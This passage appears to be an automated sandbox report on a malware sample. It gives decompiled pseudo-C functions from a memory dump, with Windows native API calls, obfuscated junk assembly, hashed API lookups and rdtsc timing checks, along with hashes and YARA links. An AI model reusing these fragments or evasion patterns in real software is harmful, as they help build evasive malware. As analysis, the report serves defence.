                                                        • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                        • Instruction Fuzzy Hash: D40171B5E0020EEBDF10EBE4DD41FDEB7B89B54208F008195E94997241F630EB14DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01099F1A, Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 65%
                                                        			E01099F1A(void* __eax, void* __ecx, intOrPtr __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t24;
				void* _t35;
				intOrPtr _t37;

				asm("sahf");
				_t1 = __ecx - 0x4b;
				_t37 =  *_t1;
				 *_t1 = __esi;
				asm("aam 0x55");
				_t18 = _v0;
				_push(_t37);
				_t5 = _t18 + 0xc40; // 0xc40
				E0109AB20(_t35, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t24;
			}







                                                        0x01099f1a
                                                        0x01099f1c
                                                        0x01099f1c
                                                        0x01099f1c
                                                        0x01099f1f
                                                        0x01099f23
                                                        0x01099f29
                                                        0x01099f2f
                                                        0x01099f37
                                                        0x01099f6d
                                                        0x01099f71

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,01089CC3,?,01094B77,01089CC3,FFFFFFFF,?,?,FFFFFFFF,01089CC3,01094B77,?,01089CC3,00000060,00000000,00000000), ref: 01099F6D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 489318f182794dfbab7f3690caa709fa957e86f350446ee0535825d620deb5a7
                                                        • Instruction ID: 7b70fb643b5e42baca1da23ae52334807b894355de957cf03f4f48306b40bc61
                                                        • Opcode Fuzzy Hash: 489318f182794dfbab7f3690caa709fa957e86f350446ee0535825d620deb5a7
                                                        • Instruction Fuzzy Hash: B301A4B2204118AFCB08DF88DC94EEB77ADBF8C754F158249FA1D97241D630E951CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01099F20, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01099F20(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0109AB20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                        0x01099f2f
                                                        0x01099f37
                                                        0x01099f6d
                                                        0x01099f71

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,01089CC3,?,01094B77,01089CC3,FFFFFFFF,?,?,FFFFFFFF,01089CC3,01094B77,?,01089CC3,00000060,00000000,00000000), ref: 01099F6D
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction ID: c9c756ca7a2eaa4249159d29c6a5f70600caba3c5763ee25eac0c7e0ccedcba6
                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction Fuzzy Hash: D5F0BDB2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01099FCA, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(01094D32,5EB6522D,FFFFFFFF,010949F1,?,?,01094D32,?,010949F1,FFFFFFFF,5EB6522D,01094D32,?,00000000), ref: 0109A015
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: f356a5f5b62dd3611d75d4176b265079e3e38653fe6cfe7273dec94139dabe34
                                                        • Instruction ID: 44b28dd1465541cf297ed8accde06a7f421ff542802133ad7dcada1821f5ae6e
                                                        • Opcode Fuzzy Hash: f356a5f5b62dd3611d75d4176b265079e3e38653fe6cfe7273dec94139dabe34
                                                        • Instruction Fuzzy Hash: 73F0E7B2200108AFCB14DF99DC91EEB77A9EF8C754F118248FE1D97241C630E815CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01099FD0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E01099FD0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0109AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}






                                                        0x01099fd3
                                                        0x01099fdf
                                                        0x01099fe7
                                                        0x0109a015
                                                        0x0109a019

                                                        APIs
                                                        • NtReadFile.NTDLL(01094D32,5EB6522D,FFFFFFFF,010949F1,?,?,01094D32,?,010949F1,FFFFFFFF,5EB6522D,01094D32,?,00000000), ref: 0109A015
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction ID: 4952ac4b946db25ca69d459f0daa43936131b32fee292899aa0dcc76ff1877d1
                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction Fuzzy Hash: 21F0A4B2200208ABCB14DF89DC90EEB77ADAF8C754F158649BE1D97241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A0FA, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E0109A0FA(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("cld");
				ds = 0x63;
				asm("cmpsb");
				asm("int 0x55");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0109AB20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                        0x0109a0fa
                                                        0x0109a0fd
                                                        0x0109a0fe
                                                        0x0109a0ff
                                                        0x0109a103
                                                        0x0109a10f
                                                        0x0109a117
                                                        0x0109a139
                                                        0x0109a13d

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0109ACF4,?,00000000,?,00003000,00000040,00000000,00000000,01089CC3), ref: 0109A139
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: f03ab3bfef9be5060862a0ea82e56f11c00e18105e316530b5da0997f038cef9
                                                        • Instruction ID: c700c2641293d0021b84e2196b54a323d08e1dc20ea01dac613bdb864f0f49fb
                                                        • Opcode Fuzzy Hash: f03ab3bfef9be5060862a0ea82e56f11c00e18105e316530b5da0997f038cef9
                                                        • Instruction Fuzzy Hash: 89F01CB2200209ABDB14DF88DC91FE777ADBF88750F118549BE189B241C630E911CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0109A100(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0109AB20(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                        0x0109a10f
                                                        0x0109a117
                                                        0x0109a139
                                                        0x0109a13d

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0109ACF4,?,00000000,?,00003000,00000040,00000000,00000000,01089CC3), ref: 0109A139
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction ID: 35fc821a5e432c29b8e3bcfdc0c97264c28252cf69b31d86a3b33038bbf82b57
                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction Fuzzy Hash: 3DF015B2200208ABCB14DF89DC90EEB77ADAF88650F118549BE1897241C630F810CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A04C, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E0109A04C(void* _a4) {
				intOrPtr _v0;
				long _t8;
				void* _t11;

				_push(0x556f35b5);
				_t5 = _v0;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x108a913
				E0109AB20(_t11, _v0, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a4); // executed
				return _t8;
			}






                                                        0x0109a04c
                                                        0x0109a053
                                                        0x0109a056
                                                        0x0109a05f
                                                        0x0109a067
                                                        0x0109a075
                                                        0x0109a079

                                                        APIs
                                                        • NtClose.NTDLL(01094D10,?,?,01094D10,01089CC3,FFFFFFFF), ref: 0109A075
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: ce24db5f89cc529c7dd6cc649969c6fa4bc5c883f81e1b3228f729eb06028678
                                                        • Instruction ID: d62a0eb2254b3fbeda39e4f81c3f8db579bb1f1571e7426b1099c0d0bb166a8e
                                                        • Opcode Fuzzy Hash: ce24db5f89cc529c7dd6cc649969c6fa4bc5c883f81e1b3228f729eb06028678
                                                        • Instruction Fuzzy Hash: 43D01776600214ABDB14EF98DC85FE77B69EF88760F154899BA589B242C530EA008BE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0109A050(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x108a913
				E0109AB20(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                        0x0109a053
                                                        0x0109a056
                                                        0x0109a05f
                                                        0x0109a067
                                                        0x0109a075
                                                        0x0109a079

                                                        APIs
                                                        • NtClose.NTDLL(01094D10,?,?,01094D10,01089CC3,FFFFFFFF), ref: 0109A075
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction ID: 3a558fbd31cc5d2c7e87d865d739f480de9f9410d2ee1695cb07432a038f76dc
                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction Fuzzy Hash: 33D01776200214ABDB10EB98DC85FE77BADEF48660F154499BA589B242C530FA0087E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01089A80, Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E01089A80(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* __edi;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t47;
				intOrPtr* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;

				_t49 = _a4;
				_t39 = 0; // executed
				_t24 = E01087E80(_t49,  &_v24); // executed
				_t51 = _t50 + 8;
				if(_t24 != 0) {
					_t40 =  &_v840;
					E01088090( &_v24,  &_v840);
					_t52 = _t51 + 8;
					_push(_t47);
					do {
						E0109B9D0(_t40, _t47,  &_v284, 0x104);
						_t40 =  &_v804;
						E0109C040( &_v284,  &_v804);
						_t53 = _t52 + 0x10;
						_t47 = 0x4f;
						while(1) {
							_t31 = E01094DB0(_t40, __eflags, E01094D50(_t49, _t47),  &_v284);
							_t53 = _t53 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - 0x62;
							if(_t47 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E010880C0(_t39, _t47,  &_v24,  &_v840);
							_t52 = _t53 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t49 + 0x14; // 0xffffe055
						_t40 =  *_t9;
						_t10 = _t49 + 0x474;
						 *_t10 =  *(_t49 + 0x474) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E01088140(_t49,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t49 + 0x55c;
						 *_t16 =  *(_t49 + 0x55c) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t49 + 0x31)) =  *((intOrPtr*)(_t49 + 0x31)) + _t39;
					_t20 = _t49 + 0x31; // 0x5608758b
					_t21 = _t49 + 0x32;
					 *_t21 =  *(_t49 + 0x32) +  *_t20 + 1;
					__eflags =  *_t21;
					return 1;
				} else {
					return _t24;
				}
			}





















                                                        0x01089a8b
                                                        0x01089a93
                                                        0x01089a95
                                                        0x01089a9a
                                                        0x01089a9f
                                                        0x01089aa7
                                                        0x01089ab2
                                                        0x01089ab7
                                                        0x01089aba
                                                        0x01089ac0
                                                        0x01089acc
                                                        0x01089ad1
                                                        0x01089adf
                                                        0x01089ae4
                                                        0x01089ae7
                                                        0x01089af0
                                                        0x01089b02
                                                        0x01089b07
                                                        0x01089b0a
                                                        0x01089b0c
                                                        0x00000000
                                                        0x00000000
                                                        0x01089b0e
                                                        0x01089b0f
                                                        0x01089b12
                                                        0x00000000
                                                        0x00000000
                                                        0x01089b14
                                                        0x01089b21
                                                        0x01089b2c
                                                        0x01089b31
                                                        0x01089b34
                                                        0x01089b36
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01089b36
                                                        0x01089b16
                                                        0x01089b16
                                                        0x01089b19
                                                        0x01089b19
                                                        0x01089b19
                                                        0x01089b1f
                                                        0x00000000
                                                        0x01089b38
                                                        0x01089b38
                                                        0x01089b38
                                                        0x01089b3c
                                                        0x01089b41
                                                        0x01089b4a
                                                        0x01089b4c
                                                        0x01089b4e
                                                        0x01089b54
                                                        0x01089b58
                                                        0x01089b5b
                                                        0x01089b5b
                                                        0x01089b5b
                                                        0x01089b5b
                                                        0x01089b62
                                                        0x01089b65
                                                        0x01089b6a
                                                        0x01089b6a
                                                        0x01089b6a
                                                        0x01089b77
                                                        0x01089aa6
                                                        0x01089aa6
                                                        0x01089aa6

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ff8d5cee883a8eda215e492a27d3c418d5fcab1bd3a91e0bbddc648d2992c04
                                                        • Instruction ID: bd4a50b4599f21deb8cb218142653a521131fad2adb7fa2ff63c1f69b0f520c5
                                                        • Opcode Fuzzy Hash: 7ff8d5cee883a8eda215e492a27d3c418d5fcab1bd3a91e0bbddc648d2992c04
                                                        • Instruction Fuzzy Hash: 40214C72D4421957CF15F664AD51BFF73FC9B90308F4400ADE9C993141F634AA09CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010882E8, Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E010882E8(signed int __eax, void* __ebx, long _a8) {
				intOrPtr _v0;
				char _v71;
				char _v72;
				void* _t14;
				int _t15;
				long _t24;
				intOrPtr _t27;
				int _t28;
				void* _t31;
				void* _t32;
				signed int _t37;

				asm("les edi, [ebx+0x63]");
				_t37 = __eax ^ 0x8b55b611;
				_t31 = _t32;
				_v72 = 0;
				E0109BA20( &_v71, 0, 0x3f);
				E0109C5C0( &_v72, 3);
				_t27 = _v0;
				_push(_t31);
				asm("rcl byte [edx-0x7d], 0xc6");
				asm("sbb al, 0x56"); // executed
				_t14 = E0108ACC0(_t37); // executed
				_t15 = E01094E10(_t27, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_t24 = _a8;
					_t15 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t39 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t28(_t24, 0x8003, _t31 + (E0108A450(_t39, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}














                                                        0x010882ea
                                                        0x010882ed
                                                        0x010882f1
                                                        0x010882ff
                                                        0x01088303
                                                        0x0108830e
                                                        0x01088313
                                                        0x01088317
                                                        0x01088318
                                                        0x0108831c
                                                        0x0108831e
                                                        0x0108832e
                                                        0x01088333
                                                        0x0108833a
                                                        0x0108833d
                                                        0x0108834a
                                                        0x0108834c
                                                        0x0108834e
                                                        0x0108836b
                                                        0x0108836b
                                                        0x0108836d
                                                        0x01088372

                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0108834A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 168cc52d63a85212b02440c879609ba7b17e340af0e064e54bb37706433f35d0
                                                        • Instruction ID: 7d362d03be9c5a0b8bfca7deed3c3534b5df3ed4f9824918c84c5e2520d67b19
                                                        • Opcode Fuzzy Hash: 168cc52d63a85212b02440c879609ba7b17e340af0e064e54bb37706433f35d0
                                                        • Instruction Fuzzy Hash: 0C012831A842197BEF20BA949C42FFF776CAB50B50F104105FB44BA1C1E6A4690A42E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010882F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 49%
                                                        			E010882F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr _t23;
				intOrPtr* _t24;
				void* _t25;
				void* _t29;

				_t29 = __eflags;
				_v68 = 0;
				E0109BA20( &_v67, 0, 0x3f);
				E0109C5C0( &_v68, 3);
				_t23 = _a4;
				_push(_t25);
				asm("rcl byte [edx-0x7d], 0xc6");
				asm("sbb al, 0x56"); // executed
				_t12 = E0108ACC0(_t29); // executed
				_t13 = E01094E10(_t23, _t12, 0, 0, 0xc4e7b6d6);
				_t24 = _t13;
				if(_t24 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t31 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t24(_t21, 0x8003, _t25 + (E0108A450(_t31, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                        0x010882f0
                                                        0x010882ff
                                                        0x01088303
                                                        0x0108830e
                                                        0x01088313
                                                        0x01088317
                                                        0x01088318
                                                        0x0108831c
                                                        0x0108831e
                                                        0x0108832e
                                                        0x01088333
                                                        0x0108833a
                                                        0x0108833d
                                                        0x0108834a
                                                        0x0108834c
                                                        0x0108834e
                                                        0x0108836b
                                                        0x0108836b
                                                        0x00000000
                                                        0x0108836d
                                                        0x01088372

                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0108834A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                        • Instruction ID: c9764e21fc44359084a818c1d5fd2c54305b7938422781162f7268c3996c3926
                                                        • Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                        • Instruction Fuzzy Hash: FA012631A84329BBEB20B6989C02FFE776C6B50F50F044019FF84BB1C1E6A8690643F5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010882B3, Relevance: 1.6, APIs: 1, Instructions: 54threadwindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E010882B3(void* __eax, signed int __ecx) {
				signed int _t9;
				void* _t29;
				void* _t30;

				_pop(es);
				asm("sbb [ecx+ebp*4], cl");
				_t9 = __ecx | 0xfc3b7aae;
				_t30 = _t29 - 1;
				if (_t30 != 0) goto L3;
			}






                                                        0x010882b3
                                                        0x010882b4
                                                        0x010882b8
                                                        0x010882be
                                                        0x010882bf

                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0108834A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Offset: 01080000, based on PE: true
                                                        • Associated: 0000000A.00000002.821707875.0000000001080000.00000002.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821764395.000000000109E000.00000040.00020000.sdmp Download File
                                                        • Associated: 0000000A.00000002.821781373.000000000109F000.00000020.00020000.sdmp Download File
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 5c7d6aded9bc838356784b95dad71ba481c4640e85d16729d7f94463adc26844
                                                        • Instruction ID: 352e772f00a37a4ad1f356abbb07fdd6c820d96c25c2633d1f38dff9c2101549
                                                        • Opcode Fuzzy Hash: 5c7d6aded9bc838356784b95dad71ba481c4640e85d16729d7f94463adc26844
                                                        • Instruction Fuzzy Hash: 34014E32B4D21A76EB2171782C02FFE770C5B51E20F144157FFC4EB1D1E555950551E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0109A383, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 64%
                                                        			E0109A383(void* __eax, void* __edx, void* __edi, signed int __esi, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* _t13;
				int _t15;
				signed int _t19;
				void* _t23;
				signed int _t25;

				_t19 = __edx - 1;
				asm("movsd");
				 *(__eax - 6) =  *(__eax - 6) ^ _t19;
				asm("stosb");
				_t25 = __esi & _t19;
				_pop(_t28);
				_t23 = __edi + _t19;
				 *(_t25 - 0x741374ab) =  *(_t25 - 0x741374ab) << 0x45;
				_t12 = _a8;
				_push(_t25);
				_t13 = E0109AB20(_t23, _a8,  &(_a8[0x646]),  *((intOrPtr*)(_t12 + 0xa18)), 0, 0x46);
				 *_t13 =  *_t13 + _t13;
				_t15 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t15;
			}








                                                        0x0109a383
                                                        0x0109a384
                                                        0x0109a385
                                                        0x0109a388
                                                        0x0109a389
                                                        0x0109a38b
                                                        0x0109a38c
                                                        0x0109a38e
                                                        0x0109a393
                                                        0x0109a39c
                                                        0x0109a3aa
                                                        0x0109a3ad
                                                        0x0109a3c0
                                                        0x0109a3c4

                                                        APIs
